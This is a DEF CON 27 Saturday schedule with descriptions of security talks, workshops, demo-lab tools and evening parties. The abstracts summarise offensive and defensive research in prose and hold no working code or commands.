PHVT - Bally's - Indigo Tower - 26th Floor - Leveraging Passive Network Mapping with Raspberry Pi and Python - Chet Hosmer
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - cont...(17:30-18:30) - Casting with the Pros: Tips and Tricks for Effective Phishing - Nathan Sweaney
SEV - Bally's Jubilee Tower - 3rd Floor - (18:15-18:45) - The Voice Told Me To Do It - Daniel Isler
SEV - Bally's Jubilee Tower - 3rd Floor - (18:50-19:20) - The Aspie's Guide to Social Engineering Your Way Through Life - Perry Carpenter
WS - Flamingo - Lower Level - Lake Mead I - cont...(14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - cont...(14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - cont...(14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - cont...(14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 19:00


BHV - Planet Hollywood - Melrose 1-3 Rooms - Digital Medicine 101 - Jen Goldsack
Meetups - Planet Hollywood - London Club - (19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Concorde C Ballroom - (19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Lobby Bar, under the blue thing - Dallas Hackers Party -
PHVT - Bally's - Indigo Tower - 26th Floor - The Cyberlous Mrs. Maisel: A Comedic (and slightly terrifying) Introduction to Information Warfare - Jessica "Zhanna" Malekos Smith
SEV - Bally's Jubilee Tower - 3rd Floor - cont...(18:50-19:20) - The Aspie's Guide to Social Engineering Your Way Through Life - Perry Carpenter

 

Saturday - 20:00


DC - Planet Hollywood - Firesides Lounge - Meet the EFF - Meetup Panel - Kurt Opsahl, Camille Fischer, Bennett Cyphers, Nathan 'nash' Sheard, Shahid Buttar
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Lobby Bar, under the blue thing - cont...(19:00-21:59) - Dallas Hackers Party -
Night Life - Planet Hollywood - Mezzanine Stage - Hacker Jeopardy -
Night Life - Planet Hollywood - Suite TBA - DC801 Party -

 

Saturday - 21:00


DC - Planet Hollywood - Firesides Lounge - cont...(20:00-21:59) - Meet the EFF - Meetup Panel - Kurt Opsahl, Camille Fischer, Bennett Cyphers, Nathan 'nash' Sheard, Shahid Buttar
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Lobby Bar, under the blue thing - cont...(19:00-21:59) - Dallas Hackers Party -
Night Life - Paris - Rivoli A Ballroom - (21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Kampf - Kampf
Night Life - Planet Hollywood - Mezzanine Stage - cont...(20:00-21:59) - Hacker Jeopardy -
Night Life - Planet Hollywood - Suite TBA - cont...(20:00-24:59) - DC801 Party -
Night Life - TBA - IoT Village Party -

 

Saturday - 22:00


DC - Planet Hollywood - Firesides Lounge - (22:15-22:59) - We Hacked Twitter… And the World Lost Their Sh*t Over It! - Mike Godfrey, Matthew Carr
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Rivoli A Ballroom - cont...(21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - cont...(21:00-25:59) - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - cont...(21:00-25:59) - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Club - GothCON party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Icetre Normal - Icetre Normal
Night Life - Planet Hollywood - Mezzanine Stage - Drunk Hacker History -
Night Life - Planet Hollywood - Suite TBA - cont...(20:00-24:59) - DC801 Party -
Night Life - TBA - cont...(21:00-24:30) - IoT Village Party -

 

Saturday - 23:00


Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Rivoli A Ballroom - cont...(21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - cont...(21:00-25:59) - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - cont...(21:00-25:59) - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Club - cont...(22:00-25:59) - GothCON party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Scotchandbubbles - Scotchandbubbles
Night Life - Planet Hollywood - Mezzanine Stage - cont...(22:00-23:59) - Drunk Hacker History -
Night Life - Planet Hollywood - Suite TBA - cont...(20:00-24:59) - DC801 Party -
Night Life - TBA - cont...(21:00-24:30) - IoT Village Party -

 

Saturday - 24:00


Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Rivoli A Ballroom - cont...(21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - cont...(21:00-25:59) - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - cont...(21:00-25:59) - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Club - cont...(22:00-25:59) - GothCON party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Acid-T A.K.A. DJ SmOke - Acid-T A.K.A. DJ SmOke
Night Life - Planet Hollywood - Suite TBA - cont...(20:00-24:59) - DC801 Party -
Night Life - TBA - cont...(21:00-24:30) - IoT Village Party -

 

Saturday - 25:00


Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Rivoli A Ballroom - cont...(21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - cont...(21:00-25:59) - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - cont...(21:00-25:59) - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Club - cont...(22:00-25:59) - GothCON party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Clockwork Echo - Clockwork Echo

 

Saturday - 26:00


Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -

Talk/Event Descriptions


 

DC - Paris - Track 4 - Saturday - 15:00-15:45


.NET Malware Threats: Internals And Reversing

Saturday at 15:00 in Track 4
45 minutes

Alexandre Borges Security Researcher at Blackstorm Security

.NET malware is well known to security analysts, but even though many tools such as dnSpy, .NET Reflector, de4dot and so on exist to make the analysis easier, most professionals have used them as black-box tools, without concerning themselves with .NET internals, structures, MSIL coding and details. In critical cases, it is necessary to have enough knowledge about the internal mechanisms and to debug these .NET threats using WinDbg.

Unfortunately, .NET malware samples have become very challenging because it is so complicated to deobfuscate the associated resources, as well as to unpack and dump them from memory. Furthermore, most GUI debugging tools do not give an inside view of mechanisms such as the CLR Loader, the Managed Heap, synchronization issues and Garbage Collection.

On the other hand, .NET malware threats are incredibly interesting when analyzed from the MSIL instruction code, which makes it possible to see code injections done using MSIL, and attempts to compromise the .NET Runtime keep being a real concern.

The purpose of this presentation is to help professionals understand .NET malware threats and techniques by explaining concepts about .NET internals, mechanisms and a few reversing techniques.

Alexandre Borges
Alexandre Borges is a Security Researcher who has been working daily on Reverse Engineering and Digital Forensic Analysis for many years. He has taught training courses about Malware and Memory Analysis, Digital Forensics Analysis and Mobile Forensics around the world. Furthermore, Alexandre is the creator and maintainer of the Malwoverview triage tool: https://github.com/alexandreborges/malwoverview.

Alexandre has spoken in several conferences such as DEF CON USA (2018), DEF CON CHINA (2019), CONFidence Conference 2019, HITB 2019 Amsterdam, H2HC Conference (2015/2016), BSIDES Sao Paulo (2019/2018/2017/2016) and BHACK Conference (2018).

Finally, he is a referee of Digital Investigation: The International Journal of Digital Forensics & Incident Response (https://www.journals.elsevier.com/digital-investigation/editorial-board).

Twitter: @ale_sp_brazil
LinkedIn: http://www.linkedin.com/in/aleborges
Website: http://www.blackstormsecurity.com/bs/en/en_articles.html, Tool: https://github.com/alexandreborges/malwoverview



 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 12:00-12:59


"First-Try" DNS Cache Poisoning with IPv4 and IPv6 Fragmentation

Travis Palmer, Security Research Engineer at Cisco
Brian Somers, Site Reliability Engineer at Cisco

DNS fragmentation attacks are a more recent series of cache poisoning attacks on resolvers. Even if DNSSEC is fully implemented, an attacker can still poison various unsigned records in the response. These types of attacks are difficult but have been considered feasible over IPv4, and impossible over IPv6. Unfortunately, changes to the Linux kernel have made the entropy limiting this attack inferable off-path, so poisoning on the first iteration is now possible. This talk will cover how this attack is carried out, and the mitigations that operators of DNS servers can put in place to limit its effectiveness.

Travis (Travco) Palmer is a Security Research Engineer at Cisco. Travis is a certified OSCP and OSCE who has been getting paid to either fix or break something for over seven years. He is a fan (and sometimes contributor) of a number of simulator/sandbox video games, and keeper of too many unfinished hardware projects.

Brian Somers is a Site Reliability Engineer for Cisco Umbrella (formerly OpenDNS). He specializes in large scale development on Unix-like platforms, software design & architecture, low level C development, and FreeBSD development.



 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 16:00-16:59


(Re)Thinking Security Given the Spectre of a Meltdown (hold my beer)

Jeff Man, InfoSec Curmudgeon

Have you ever noticed that much of the mission of cyber- and information security professionals seems to be focused on vulnerabilities? Have you ever heard of the risk equation? Perhaps you are familiar with one or more versions that help you derive the risk to your organization (sometimes referred to as residual risk). I have been wondering for a while how to suggest to our industry that there is perhaps TOO much focus on vulnerabilities and not enough attention or focus on the other elements that make up the standard risk equation. The recent disclosure of Meltdown/Spectre introduced a "perfect storm" scenario where the vulnerability wasn't easy to patch or fix, and the solution seemed to break things. This created a situation where the "security solution" wasn't simply to apply the patch, and that left many organizations scrambling to figure out how to deal with this example of a persistent vulnerability. This is a great example of what I've wanted to discuss for a while: what else should we focus on in terms of security if/when the vulnerabilities still remain? Interested? Intrigued? Come join the discussion!

Jeff Man (Twitter: @MrJeffMan) is an infosec curmudgeon.



 

Night Life - Paris - Rivoli B Ballroom - Saturday - 21:00-25:59


Title:
303/Skytalks Party

A repeat favorite of DEF CON attendees, with DJs from across the community as well as creative works and technical expertise. What can we say, it's 303!
https://twitter.com/dcskytalks/status/1146527983588401158


 

AVV - Bally's Event Center - Saturday - 11:00-11:59


A hacker's first solo: airplane avionics security 101

No description available



 

RGV - Flamingo - 3rd Floor - Carson City II - Saturday - 14:00-14:59


Title:
A Life of Advantage Play

J.R. from Four Suits will interview rx gamble, a professional gambler who has earned her living beating casinos. An advantage player, she is focused on finding the flaws and gaps in casino game procedures that allow the careful player to gain an edge. With thousands of hours spent on games like poker, blackjack, and more, she will discuss some of the physical techniques, psychological ploys, and oddities of casino history that make it possible to beat the odds.

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 12:30-13:05


LIVE TOOL DEMO

“Can you add a conference line, please?” - Using Cloud Services for Dial-In Reconnaissance Automation

1230 - 1305

Alina Dorina



 

ICS - Bally's Event Center - Saturday - 14:00-14:30


Abusing the IoT in Smart Buildings

August 10, 2019 2:00 PM

Building Automation Systems control functions such as air conditioning, access control, and video surveillance in critical facilities such as data centers and airports. With the advent of the IoT, sensors, controllers and many other devices (e.g., surveillance cameras) are available in consumer shops and are being integrated into new and existing smart buildings. These devices are much cheaper than industrial controllers and far easier to install, but they often lack security features and vulnerabilities are discovered with increasing frequency. In addition, bad security practices such as simple or default credentials, unencrypted traffic and lack of network segmentation remain common. In this presentation, we discuss the results of research conducted at Forescout in the past 2 years, including: an analysis of the security landscape for smart buildings with industrial controllers and IoT devices; the development of a proof-of-concept malware using newly discovered and previously known vulnerabilities; and a description of how this can be used by malicious actors in emerging attack scenarios.

Speaker Information

Panelist Information

Daniel dos Santos

Forescout

Daniel dos Santos holds a PhD in computer science from the University of Trento and has experience in security consulting and research. He is a researcher at Forescout, focusing on vulnerability research and the development of innovative features for network security monitoring.



 

PHVW - Bally's - Indigo Tower - 26th Floor - Saturday - 16:00-17:59


Advanced APT Hunting with Splunk

John Stoner, Principal Security Strategist, Splunk
Ryan Kovar, Principal Security Strategist, Splunk

You wanna learn how to hunt the APTs? This is the workshop for you. Using a real-worldish dataset, this workshop will teach you how to hunt the “fictional” APT group Taedonggang. We discuss the Diamond model, hypothesis building, LM Kill Chain, and Mitre ATT&CK framework and how these concepts can frame your hunting. Using the freely available version of Splunk and OSINT, we will hunt for APT activity riddling a small startup's network. During the event, you will be presented a hypothesis and conduct your own hunts, whether it is for persistence, exfiltration, c2 or other adversary tactics. Heck, there might be some PowerShell to be found, too. We will regroup and review the specific hunt and discuss findings and what opportunities we have to operationalize these findings as well. At the end, we give you a dataset and tools to take home and try newly learned techniques yourself.

John Stoner (Twitter: @stonerpsu) is a Principal Security Strategist at Splunk where he enjoys writing, problem solving and building stuff. When not doing cyber things, you can find him reading or binge watching TV series that everyone else has already seen.

Ryan Kovar fought in the cyberwars and has been doing cybery things for almost 20 years. Now he is a Principal Security Strategist at Splunk building cool stuff, talking about security thingies, and helping other people fight their battles. He hates printers.



 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 14:00-13:59


Adversarial Fashion – Sartorial Hacking to Combat Surveillance

No description available



 

BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 14:00-14:59


Anatomy Of A Megabreach: Equifax Report

Saturday 14:00, Savoy Ballroom, Flamingo (Blue Team Village) (1H)

@uncl3dumby is enamored with defense and protective thinking. My career has focused on security operations, but I love understanding the way systems operate. I'm passionate about investigating root cause of incidents, or how things came to be the way they are. Security is a full-stack, cross discipline field and I love learning about and digging into it all!

Following testimony in Congress and a lengthy investigation of the Equifax breach in 2016, the U.S. House of Representatives drafted a report. The report is AMAZING! It includes details of Equifax's corporate structure and IT infrastructure, and covers timelines and minutiae of the breach itself. It has information that is extremely interesting and useful for security practitioners, but we might not all have the time or interest to wade through 97 pages of deep information. I did that for you! My talk is a comprehensive review of the report that covers everything I considered interesting or important.



 

DC - Paris - Track 4 - Saturday - 16:30-16:50


Apache Solr Injection

Saturday at 16:30 in Track 4
20 minutes | Demo, Exploit

Michael Stepankin Security Researcher at Veracode

Apache Solr is a search platform used by many enterprise companies to add a full text search functionality to their websites. Often hidden behind firewalls, it provides a rich API to search across large datasets. If this API is used by web applications in a wrong way, it may open a possibility for injection attacks to completely modify the query logic.

In this talk we’ll shed some light on the new type of vulnerabilities for web applications - Solr parameter injection, and provide some useful ways how to achieve remote code execution through it. We also provide exploits for almost all known vulnerabilities for Apache Solr, including the two new RCEs we reported this year.

Michael Stepankin
Michael Stepankin is a Security Researcher at Veracode. He works on bringing new detection features to Veracode’s dynamic and static scanner engines. As a passionate hacker, he loves to hack enterprise java applications by day and write beautiful JavaScript code by night. Listed in Halls of Fame of various bug bounty programs, Michael has also worked as a penetration tester for many years.

Twitter: @artsploit



 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 10:40-11:20


Speaker: Ayman Elsawah

Twitter: @coffeewithayman

Abstract: In this talk I am going to walk through how we can use Pareto's principle to secure all our AWS accounts. What this means is that with just 20% of the effort, we can accomplish 80% of the security of our AWS accounts. We will be leveraging the power of AWS Organizations and IAM to accomplish our goals. This will be a technical talk and a guide on how to secure your accounts.

This talk assumes you have secured your individual AWS accounts at a basic level, for example by locking down your root accounts with 2FA.

About Ayman: Ayman Elsawah is a veteran Information Security Professional and Educator who has worked in a variety of industries including Financial, Social Media, Global E-Commerce, Silicon Valley Startups, and the Movie/Entertainment Industry. An early user of AWS, Ayman specializes in AWS Security and helps companies operationalize their presence in the cloud and take their security maturity to the next level. He has built custom tools internally for organizations with hundreds of AWS accounts, helping streamline their operations. His specializations are Centralized Log Management and Identity and Access Management (IAM). He is also the host of the Getting Into Infosec Podcast and author of the book Breaking IN: A Practical Guide to Starting a Career In Information Security. He loves teaching others about Information Security and Cloud.



 

Night Life - Paris - Rivoli A Ballroom - Saturday - 21:30-25:59


Title:
Arcade Party

Relive once again the experience of the arcade at DEF CON. From classics to a custom-built 16-player foosball table! Jam out to DJ Keith Myers while taking another swipe at that high score on your favorite classic video games. No quarters required! This party is open to all DEF CON 27 attendees. Registration is not required. This EPIC party is sponsored by: SCYTHE, GRIMM, ICS Village, DRAGOS, and Bugcrowd


 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 13:00-13:59


BadSalt (Adversarial DevOps)

SaltStack is a robust configuration management utility used by many to achieve DevOps-related initiatives in their organizations. Thanks to its open source model, SaltStack can be used by hobbyists, hackers, and corporations alike. Like any open source tool suite out there, that also means individuals with adversarial intent, be it professional or malicious, can also take advantage of this tool. In its simplest case, SaltStack can be used by an adversary as a basic Command and Control server (C2 server). However, if SaltStack is used as intended, an educated adversary can easily turn Salt "bad" in more ways than simple command and control.
By re-configuring and automating basic settings within the Salt Master and Salt Minion configurations, it is easy to deploy SaltStack across many systems for any scenario. Coupling this ease of deployment with a basic understanding of configuration management and scripted stagers, the result is a powerful post-exploitation framework with a built-in C2 server that is simply SaltStack, but in use by an adversary. There are many benefits to using such a tool suite from an adversarial perspective, such as easily bypassing AV with trusted Salt Minions, and taking advantage of the desired state configurations to build out robust, scalable post-exploitation persistence modules.
Part of the research conducted was not just on how an adversary might use SaltStack, but also on how they might target a SaltStack environment. Man-in-the-middle attacks are a concerning attack vector against Salt Minions at the time of this research. SaltStack has strong protections against this, but they are not enabled by default because a unique public key has to be distributed manually. It is up to the individual(s) deploying SaltStack to make sure they enable the proper security features to be safe from these attacks. Fortunately, SaltStack does have a few compensating controls that make this less likely after a successful deployment, but it is important that all SaltStack users are made aware of the importance and impact that just one particular setting can have on their infrastructure. Fortunately, methods of detecting this activity are clear and well documented, but unfortunately a successful attack usually means root access on the target, which could result in an adversary clearing their tracks. This could make it difficult to perform root cause analysis unless network traffic was analyzed at the time of the event.
The overall goal of this research is to show how advances in tools for perfectly legitimate Information Technology initiatives, like DevOps, can be turned into sophisticated tool suites for attackers. In true hacker spirit, this technology can be used for completely unintended purposes. This presentation will provide insight into how SaltStack could be attacked or used in an adversarial context, and also how those attacks or uses could be detected and prevented.

About Casey Erdmann: Casey Erdmann, also known as 3ndG4me to his CTF teammates and online social communities, is an avid offensive security nerd. Casey is 23 years old, and has a love for CTFs and application security. He is the co-founder of DC706, and is active in his local computer security community. Casey has been responsible for implementing infrastructure for local high-school CTF competitions, and for coaching his local university's SECCDC team. Casey is also responsible for developing the OpenVPN Connect module for the WiFi Pineapple, as well as Propane King of the Hill, a NetKotH rewrite inspired by members of DC 404. When he isn't writing neat tools or reaching out to his local community, Casey spends about 90% of his free time researching the latest offensive security news/techniques and playing CTFs trying to "get good", with the other 10% being writing music, playing video games, or optional sleep. Twitter: @3ndG4me_



 

DL - Planet Hollywood - Sunset 6 - Saturday - 12:00 - 13:50


bedr

Saturday from 12:00 – 13:50 in Sunset 6 at Planet Hollywood
Audience: Defense, Linux

Mark Ignacio

bedr is a Linux syscall monitor that uses Berkeley Packet Filters that hook via kernel tracepoints. It collects the holy trinity of EDR data (proc events, filemods, and netconns) and ships them off to somewhere else for off-machine detection and response. Basically, it's half of what you need to make an EDR!

https://github.com/mark-ignacio/bedr

Mark Ignacio
Mark is a security engineer that does operating system security things on Windows and Linux. He likes coding in Go a lot and is a consistent believer that this year will be the Year of Linux on the Desktop.



 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 10:30-11:30


Breaking NBAD and UEBA Detection

Network Behavior Anomaly Detection (NBAD) and User and Entity Behavior Analytics (UEBA) are heralded as machine learning fueled messiahs for finding advanced attacks. The data collection and processing methodologies of these approaches create a series of new exploitable vectors that can allow attackers to navigate network and systems undetected. In this session, methods for poisoning data, transforming calculations and preventing alerts will be examined. Proof of concept Python code will be demonstrated and made available. Approaches to harden against these attacks will also be discussed as well as outlining needed changes in detection standards.

About Charles: WitFoo Chief Technology Officer. Charles' dedication to maturing the craft of InfoSec is built on a diverse career path across the industry. He started his career in InfoSec in the US Navy in 2002, serving as the Network Security Officer at the US Naval Postgraduate School. After leaving active duty, he was a contributing product reviewer for InfoWorld magazine focusing on network security products. Charles spent 7 years running Herring Consulting, a company dedicated to process orchestration, data sharing, and marketing. In 2012, Charles joined the Lancope team as a pre-sales engineer, was promoted to Consulting Security Architect and later Strategic Account Manager following the acquisition of Lancope by Cisco. In 2014, Charles partnered with veterans of the military, law enforcement and cybersecurity to research new approaches to improve the craft of cybersecurity operations. In 2016, that research resulted in the forming of WitFoo. When not working with cybersecurity heroes, Charles enjoys SCUBA diving with his wife, Mai. Twitter: @charlesherring



 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 10:00-10:40


Speaker: Chris Le Roy

Twitter: @brompwnie

Abstract: Containers, Cloud, DevOps and SDLC are all terms whose usage is increasing in the InfoSec world. In this talk, we discuss how a container exploitation tool (BOtB) was developed to identify and autopwn common vulnerabilities in container technologies such as Docker and LXC, and how this tool was used in a modern SDLC environment using common CI/CD technologies to identify, exploit and remediate container vulnerabilities before releases were made to production.

In this talk we elaborate on how and why BOtB was built to be used by pentesters to exploit container vulnerabilities and how BOtB can be used by engineers to secure their container environments. The talk will also explain the technical details around the vulnerabilities that can be exploited by BOtB.

About Chris: Chris is a security researcher based in London. He has not had an unusual entrance to infosec, coming from a Computer Science background which led him to dabble in software development for some time. This resulted in Chris realising he is a terrible dev and prefers breaking things, which led him to breaking things full-time. The breaking of things full-time has allowed Chris to share his ramblings at multiple conferences in the USA and Europe.



 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 16:45-17:30


4:45 PM: Building a New Decentralized Internet, With the Nodes Implanted in Our Bodies
Speaker: Nick Titus + Zac Shannon + Mixl S. Laufer

Abstract: The internet is broken. It's vulnerable to manipulation, censorship, shutdowns, surveillance, and on top of all that, it costs to access it. What if we could bypass all that? The PirateBox platform with its meshing capability creates this possibility, but somehow has gained little traction. If every WiFi-enabled device just became a node on a mesh network, we would have a replacement for the hardware layer of the internet. To show how powerful this platform can be, and take it to the next level, we have created the PegLeg, an implanted cybernetic enhancement that turns the user into an anonymized local area network on which people can chat and share files anonymously, as well as mesh with other nearby networks. The PegLeg differs from a wearable, as it cannot be confiscated, and has no battery. Come learn how you can turn your phone, laptop, Raspberry Pi, or router into a meshing PirateBox, and build a new internet. And if you are really committed, you can build the implant yourself, and be a walking pirate server with a PegLeg.
Speaker Bio:

Nick Titus invented his first assistive device in high school. This open source wearable electrically simulated a patient's muscles to move in accordance with mental commands transmitted by an EEG headset. After winning most innovative hardware at Tech Crunch NYC 2017 and sharing his story at TedxCU, Nick leaned into the biohacking movement as a whole. He has since focused his efforts on leveraging emerging technology to address overlooked challenges in all aspects of biology. He now lives in Boulder, CO where he collaborates on multiple humanitarian-driven biotech projects.

Zac Shannon is too cool to brag about all the awesome things he's done, but he did take care of porting the operating system, and the meshing of the PirateBox platform for the PegLeg, as well as segregating the file system from the OS, so that the machine will not brick even in the case of a corrupted file system created from a hard shut down.

Mixl S. Laufer worked in mathematics and high energy physics until he decided to use his background in science to tackle problems of world health and other social issues. Perpetually disruptive, his flagship project makes it possible for people to manufacture their own medications at home. Open-source, and made from off-the-shelf parts, the Apothecary MicroLab puts many medications within the reach of those who would otherwise not have them. The project which garnered his group the most press was the EpiPencil, an open-source version of the EpiPen which costs only $30 to produce, and $3 to refill.


 

DL - Planet Hollywood - Sunset 1 - Saturday - 12:00 - 13:50


Burp Plugin: Cyber Security Transformation Chef (CSTC)

Saturday from 12:00 – 13:50 in Sunset 1 at Planet Hollywood
Audience: Offense, Defense, AppSec, Mobile.

Ralf Almon & Sebastian Puttkammer

CSTC is a Burp Suite extension for various input transformations. It implements a generic solution that can replace numerous specialized extensions. The CSTC solves the problem of having too many overly specific Burp plugins by being a more generic problem-solving tool. It contains a wide range of very simple operations that can be chained into complex transformations. This allows a penetration tester to create the exact transformation they need to test a specific product without having to write any code. As we all know, writing code and setting everything up is time consuming. You can configure complex input transformations for both requests and responses simply by using drag and drop. You can calculate HMACs for parts of the request, refresh timestamps, update sequence numbers or encrypt parts of the request. You can chain together different operations to create more complex transformations. For example, you could extract parts of the request, decompress them, insert your payload using the Repeater or the Scanner, put it back in and compress it again before sending it. Since many basic operations are already implemented, you can focus on testing the application instead of searching for extensions that perform such transformations.

https://github.com/usdag/cstc

Ralf Almon
Ralf Almon is a Security Analyst with years of experience in penetration testing. He works at usd AG in Germany and holds a master’s degree in Information Security from TU Darmstadt. He gained a lot of industry knowledge working as a consultant in various industries ranging from aerospace and aviation to the finance sector.

Sebastian Puttkammer
Sebastian Puttkammer is a Security Analyst working for usd AG in Germany. His main interests are network/web app security and reverse engineering. He holds a master’s degree in computer science from TU Darmstadt. He is currently in charge of the Code Review Team at usd AG and performs black-box and white-box pentests.



 

PHVW - Bally's - Indigo Tower - 26th Floor - Saturday - 09:00-10:59


Burp Suite Workshop

Sunny Wear, Nestor Torres

Gain hands-on experience with Burp Suite in this four-hour workshop with the author of the Burp Suite Cookbook, Sunny Wear. You will learn how to use Burp Suite to hone your web application penetration testing skills. Each student receives a virtualized environment complete with a copy of Burp Suite and a vulnerable web application to hack. Lessons covered in the workshop include Burp configuration settings, injection attacks such as Cross-site Scripting and SQL Injection, automated attacks using Intruder, recommended BApp extensions and their uses, and finally, how to build and use Burp Macros.

Sunny Wear (Twitter: @SunnyWear) is an Application Security Architect and Web Application Penetration Tester. Her breadth of experience includes network, data, application and security architecture as well as programming across multiple languages and platforms. She is the author of several security-related books including her most recent, Burp Suite Cookbook, which assists pentesters and programmers in more easily finding vulnerabilities within applications while using Burp Suite. She conducts security talks and classes locally and at conferences like BSides Tampa, BSides Orlando, AtlSecCon, Hackfest CA, and BSides Springfield.

Nestor Torres (Twitter: @N3S____) is a security analyst working closely with developers to pentest and fix their Web Applications. He is passionate about helping others and teaching those who are hungry to learn cybersecurity. Some of his hobbies involve building labs for vulnerability testing and setting up small to medium enterprise networks.



 

DL - Planet Hollywood - Sunset 1 - Saturday - 14:00 - 15:50


Burpsuite Team Server for Collaborative Web App Testing

Saturday from 14:00 – 15:50 in Sunset 1 at Planet Hollywood
Audience: Offense, AppSec

Tanner Barnes

During large-scale engagements against multiple applications, teams often split the workload across many testers. Currently, sharing Burpsuite states requires exporting large point-in-time files, requiring multiple exports and shares as new developments in the engagement occur, which restricts the ability of teams to collaborate on an application. With my new Burpsuite plugin, coupled with a lightweight server, multiple testers can share traffic in real time across multiple applications, allowing for quick collaboration! Have a repeater payload your team needs to see? Simply right click the request and select share to populate their repeater tabs! Need help with an intruder payload? Have another tester create it and send it to you! Come listen and see how this plugin can help your teams hack collaboratively!

https://github.com/Static-Flow/BurpSuite-Team-Extension

Tanner Barnes
Tanner Barnes is a cyber security consultant for AON Cyber Solutions providing full scope security assessment services for clients. When he isn't assessing clients' security he's building new tools to help improve the lives of other hackers.



 

Night Life - Planet Hollywood - Apex Suite - Saturday - 21:00-25:59


Title:
Car Hacking Village Party

Register To Attend


 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 17:30-18:30


Casting with the Pros: Tips and Tricks for Effective Phishing

 Phishing seems easy enough, but getting successful results can be difficult. In this talk we'll walk through practical tips for getting better responses. We'll talk about target selection, ruse development, technology deployment, and suggestions for working with clients to maximize the value of the assessment.

About Nathan Sweaney: Nathan works for Secure Ideas testing pens and consulting clients. He's been in the infosec industry for a decade or so working with a wide range of clients and technologies. He's regularly told that he takes all of the fun out of things and is eager to argue about politics and religion. Hailing from the great state of Oklahoma, he hopes you'll all keep flying over it & leave us alone. Twitter: @sweaney



 

DL - Planet Hollywood - Sunset 2 - Saturday - 10:00 - 11:50


CIRCO: Cisco Implant Raspberry Controlled Operations

Saturday from 10:00 – 11:50 in Sunset 2 at Planet Hollywood
Audience: Offense, Hardware

Emilio Couto

Built on a Raspberry Pi and aimed at Red Team Ops, CIRCO takes advantage of "Sec/Net/Dev/Ops" enterprise tools to capture network credentials in stealth mode, using low-profile hardware and electronics camouflaged as a simple network outlet box sitting under or over a desk. CIRCO includes different techniques for network data exfiltration to avoid detection by IDS/IPS or monitoring systems. The tool gathers information and uses a combination of honeypots to trick automation systems into handing over their network credentials. We will build a physical network and infrastructure lab to show how CIRCO works (live demo). Major features for release v1.5 (Aug):

- Allow existing IP-Phone to co-exist with CIRCO
- Eliminate template files (craft all packets)
- Support NTP exfiltration
- Software encrypted via Bluetooth (prevent forensic)
- Self destroy and alarm switch
- Bypass active & passive fingerprinting (NAC)
- Credentials integration into Faraday

https://github.com/ekiojp/circo

Emilio Couto
